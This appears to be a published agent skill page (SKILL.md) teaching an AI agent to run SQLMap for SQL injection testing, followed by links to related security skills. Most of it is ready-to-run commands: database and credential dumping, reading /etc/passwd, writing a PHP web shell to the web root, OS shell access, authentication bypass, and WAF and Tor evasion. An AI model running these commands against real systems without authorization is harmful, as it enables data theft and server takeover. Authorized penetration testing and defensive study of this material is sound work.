Agent skill

webapp-sqlmap

Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

View SKILL.md on GitHub Repository
Stars 84
Forks 15

Install this agent skill to your Project

npx add-skill https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/webapp-sqlmap

SKILL.md

SQLMap - Automated SQL Injection Tool

Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.

IMPORTANT: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.

Quick Start

Basic SQL injection detection:

bash
# Test single parameter
sqlmap -u "http://example.com/page?id=1"

# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"

# Test from saved request file
sqlmap -r request.txt

# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs

Core Workflow

SQL Injection Testing Workflow

Progress: [ ] 1. Verify authorization for web application testing [ ] 2. Identify potential injection points [ ] 3. Detect SQL injection vulnerabilities [ ] 4. Determine DBMS type and version [ ] 5. Enumerate databases and tables [ ] 6. Extract sensitive data (if authorized) [ ] 7. Document findings with remediation guidance [ ] 8. Clean up any test artifacts

Work through each step systematically. Check off completed items.

1. Authorization Verification

CRITICAL: Before any SQL injection testing:

  • Confirm written authorization from application owner
  • Verify scope includes web application security testing
  • Understand data protection and handling requirements
  • Document allowed testing windows
  • Confirm backup and rollback procedures

2. Target Identification

Identify potential SQL injection points:

GET Parameters:

bash
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"

# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"

# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3

POST Requests:

bash
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"

# From Burp Suite request file
sqlmap -r login_request.txt

# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"

Cookies and Headers:

bash
# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"

# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"

# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"

3. Detection and Fingerprinting

Detect SQL injection vulnerabilities:

bash
# Basic detection
sqlmap -u "http://example.com/page?id=1"

# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3

# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ

# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint

# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql

Injection Techniques:

  • B: Boolean-based blind
  • E: Error-based
  • U: UNION query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

4. Database Enumeration

Enumerate database structure:

bash
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs

# Current database
sqlmap -u "http://example.com/page?id=1" --current-db

# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables

# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns

# Database users
sqlmap -u "http://example.com/page?id=1" --users

# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges

5. Data Extraction

Extract data from database (authorized only):

bash
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump

# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump

# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all

# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs

# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password

6. Advanced Exploitation

Advanced SQL injection techniques:

File System Access:

bash
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"

# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

OS Command Execution (requires stacked queries or out-of-band):

bash
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"

# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell

# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell

Authentication Bypass:

bash
# Attempt to bypass login
sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic

# Test with authentication
sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password"

7. WAF Bypass and Evasion

Evade web application firewalls:

bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between

# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent

# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."

# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2

# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"

# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor

Common Tamper Scripts:

  • space2comment: Replace space with comments
  • between: Replace equals with BETWEEN
  • charencode: URL encode characters
  • randomcase: Random case for keywords
  • apostrophemask: Replace apostrophe with UTF-8
  • equaltolike: Replace equals with LIKE

Security Considerations

Authorization & Legal Compliance

  • Written Permission: Obtain explicit authorization for SQL injection testing
  • Data Protection: Handle extracted data per engagement rules
  • Scope Boundaries: Only test explicitly authorized applications
  • Backup Verification: Ensure backups exist before invasive testing
  • Production Systems: Extra caution on production databases

Operational Security

  • Rate Limiting: Use --delay to avoid overwhelming applications
  • Session Management: Save and resume sessions with --flush-session
  • Logging: All SQLMap activity is logged to ~/.sqlmap/output/
  • Data Sanitization: Redact sensitive data from reports
  • False Positives: Verify findings manually

Audit Logging

Document all SQL injection testing:

  • Target URLs and parameters tested
  • Injection techniques successful
  • Databases and tables accessed
  • Data extracted (summary only, not full data)
  • Commands executed
  • Tamper scripts and evasion used

Compliance

  • OWASP Top 10: A03:2021 - Injection
  • CWE-89: SQL Injection
  • MITRE ATT&CK: T1190 (Exploit Public-Facing Application)
  • PCI-DSS: 6.5.1 - Injection flaws
  • ISO 27001: A.14.2 Security in development

Common Patterns

Pattern 1: Basic Vulnerability Assessment

bash
# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch

# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch

# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch

Pattern 2: Authentication Bypass Testing

bash
# Test login form
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  --level=5 --risk=3 \
  --technique=BE \
  --batch

# Attempt to extract admin credentials
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  -D app_db -T users -C username,password --dump \
  --batch

Pattern 3: API Testing

bash
# JSON API endpoint
sqlmap -u "http://api.example.com/user/1" \
  --headers="Content-Type: application/json\nAuthorization: Bearer token123" \
  --level=3 \
  --batch

# REST API with POST
sqlmap -u "http://api.example.com/search" \
  --data='{"query":"test","limit":10}' \
  --headers="Content-Type: application/json" \
  --batch

Pattern 4: Comprehensive Enumeration

bash
# Full enumeration (use with extreme caution)
sqlmap -u "http://example.com/page?id=1" \
  --banner \
  --current-user \
  --current-db \
  --is-dba \
  --users \
  --passwords \
  --privileges \
  --dbs \
  --batch

Integration Points

Burp Suite Integration

bash
# Save request from Burp Suite as request.txt
# Right-click request → "Copy to file"

# Test with SQLMap
sqlmap -r request.txt --batch

# Use Burp as proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"

Reporting and Output

bash
# Save session for later
sqlmap -u "http://example.com/page?id=1" -s output.sqlite

# Resume session
sqlmap -u "http://example.com/page?id=1" --resume

# Custom output directory
sqlmap -u "http://example.com/page?id=1" --output-dir="/path/to/results"

# Verbose output
sqlmap -u "http://example.com/page?id=1" -v 3

# Traffic log
sqlmap -u "http://example.com/page?id=1" -t traffic.log

Troubleshooting

Issue: False Positives

Solutions:

bash
# Increase detection accuracy
sqlmap -u "http://example.com/page?id=1" --string="Welcome" --not-string="Error"

# Use specific technique
sqlmap -u "http://example.com/page?id=1" --technique=U

# Manual verification
sqlmap -u "http://example.com/page?id=1" --sql-query="SELECT version()"

Issue: WAF Blocking Requests

Solutions:

bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between --random-agent

# Add delays
sqlmap -u "http://example.com/page?id=1" --delay=3 --randomize

# Change HTTP method
sqlmap -u "http://example.com/page?id=1" --method=PUT

Issue: Slow Performance

Solutions:

bash
# Use threads (careful with application stability)
sqlmap -u "http://example.com/page?id=1" --threads=5

# Reduce testing scope
sqlmap -u "http://example.com/page?id=1" --level=1 --risk=1

# Test specific parameter only
sqlmap -u "http://example.com/page?id=1&name=test" -p id

Defensive Considerations

Protect applications against SQL injection:

Secure Coding Practices:

  • Use parameterized queries/prepared statements
  • Employ ORM frameworks properly
  • Validate and sanitize all user input
  • Apply principle of least privilege to database accounts
  • Disable error messages in production

Web Application Firewall Rules:

  • Block common SQL injection patterns
  • Implement rate limiting
  • Monitor for suspicious query patterns
  • Alert on multiple injection attempts

Detection and Monitoring:

  • Log all database queries
  • Monitor for unusual query patterns
  • Alert on error-based injection attempts
  • Detect time-based blind injection delays
  • Monitor for UNION-based queries

References

Recommended Agent Skills

Expand your agent's capabilities with these related and highly-rated skills.

AgentSecOps/SecOpsAgentKit

policy-opa

Policy-as-code enforcement and compliance validation using Open Policy Agent (OPA). Use when: (1) Enforcing security and compliance policies across infrastructure and applications, (2) Validating Kubernetes admission control policies, (3) Implementing policy-as-code for compliance frameworks (SOC2, PCI-DSS, GDPR, HIPAA), (4) Testing and evaluating OPA Rego policies, (5) Integrating policy checks into CI/CD pipelines, (6) Auditing configuration drift against organizational security standards, (7) Implementing least-privilege access controls.

84 15
Explore
AgentSecOps/SecOpsAgentKit

ir-velociraptor

Endpoint visibility, digital forensics, and incident response using Velociraptor Query Language (VQL) for evidence collection and threat hunting at scale. Use when: (1) Conducting forensic investigations across multiple endpoints, (2) Hunting for indicators of compromise or suspicious activities, (3) Collecting endpoint telemetry and artifacts for incident analysis, (4) Performing live response and evidence preservation, (5) Monitoring endpoints for security events, (6) Creating custom forensic artifacts for specific threat scenarios.

84 15
Explore
AgentSecOps/SecOpsAgentKit

forensics-osquery

SQL-powered forensic investigation and system interrogation using osquery to query operating systems as relational databases. Enables rapid evidence collection, threat hunting, and incident response across Linux, macOS, and Windows endpoints. Use when: (1) Investigating security incidents and collecting forensic artifacts, (2) Threat hunting across endpoints for suspicious activity, (3) Analyzing running processes, network connections, and persistence mechanisms, (4) Collecting system state during incident response, (5) Querying file hashes, user activity, and system configuration for compromise indicators, (6) Building detection queries for continuous monitoring with osqueryd.

84 15
Explore
AgentSecOps/SecOpsAgentKit

detection-sigma

Generic detection rule creation and management using Sigma, the universal SIEM rule format. Sigma provides vendor-agnostic detection logic for log analysis across multiple SIEM platforms. Use when: (1) Creating detection rules for security monitoring, (2) Converting rules between SIEM platforms (Splunk, Elastic, QRadar, Sentinel), (3) Threat hunting with standardized detection patterns, (4) Building detection-as-code pipelines, (5) Mapping detections to MITRE ATT&CK tactics, (6) Implementing compliance-based monitoring rules.

84 15
Explore
AgentSecOps/SecOpsAgentKit

skill-name

[REQUIRED] Comprehensive description of what this skill does and when to use it. Include: (1) Primary functionality, (2) Specific use cases, (3) Security operations context. Must include specific "Use when:" clause for skill discovery. Example: "SAST vulnerability analysis and remediation guidance using Semgrep and industry security standards. Use when: (1) Analyzing static code for security vulnerabilities, (2) Prioritizing security findings by severity, (3) Providing secure coding remediation, (4) Integrating security checks into CI/CD pipelines." Maximum 1024 characters.

84 15
Explore
AgentSecOps/SecOpsAgentKit

pytm

Python-based threat modeling using pytm library for programmatic STRIDE analysis, data flow diagram generation, and automated security threat identification. Use when: (1) Creating threat models programmatically using Python code, (2) Generating data flow diagrams (DFDs) with automatic STRIDE threat identification, (3) Integrating threat modeling into CI/CD pipelines and shift-left security practices, (4) Analyzing system architecture for security threats across trust boundaries, (5) Producing threat reports with STRIDE categories and mitigation recommendations, (6) Maintaining threat models as code for version control and automation.

84 15
Explore

Didn't find tool you were looking for?

Be as detailed as possible for better results